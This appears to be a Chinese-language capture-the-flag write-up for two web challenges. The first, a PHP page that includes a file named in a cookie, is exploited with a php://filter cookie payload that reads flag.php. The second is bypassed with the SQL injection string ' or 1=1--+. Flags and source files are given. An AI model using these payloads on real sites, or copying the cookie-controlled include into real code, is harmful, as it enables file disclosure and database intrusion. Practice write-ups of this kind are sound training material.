fileinclude

打开题目发现php代码,发现cookie处存在文件包含漏洞

<?php
if( !ini_get('display_errors') ) {ini_set('display_errors', 'On');}
error_reporting(E_ALL);
$lan = $_COOKIE['language'];
if(!$lan)
{@setcookie("language","english");@include("english.php");
}
else
{@include($lan.".php");
}
$x=file_get_contents('index.php');
echo $x;
?>

构造payload

通过base64 读取flag.php文件

GET / HTTP/1.1
Host: 61.147.171.105:60325
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Cookie:language=php://filter/read=convert.base64-encode/resource=flag

解密后得到flag

cyberpeace{324be44cf875ca44e495c247596618c8}

同时根据题目信息得到该环境存在如下文件: index.php flag.php english.php chinese.php 有兴趣可以自己搭建看看。

依次读取内容如下:

#index.php
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head><?php
if( !ini_get('display_errors') ) {ini_set('display_errors', 'On');}
error_reporting(E_ALL);
$lan = $_COOKIE['language'];
if(!$lan)
{@setcookie("language","english");@include("english.php");
}
else
{@include($lan.".php");
}
$x=file_get_contents('index.php');
echo $x;
?>
</html>

#flag.php
<?php
$flag="cyberpeace{324be44cf875ca44e495c247596618c8}";
?>

#english.php
Please choose the language you want : English or Chinese
<?php
echo "<h1>Hi,EveryOne,The flag is in flag.php</h1>";
?>

#chinese.php
Please choose the language you want : English or Chinese
<?phpecho "<h1>HI,flag在flag.php</h1>";?>

inget

打开题目提示让传参id并尝试绕过waf

构造payload 得到flag，没有什么难度

?id=1' or 1=1--+cyberpeace{af0b21ac8ef39d514c807499d0b4fc8a}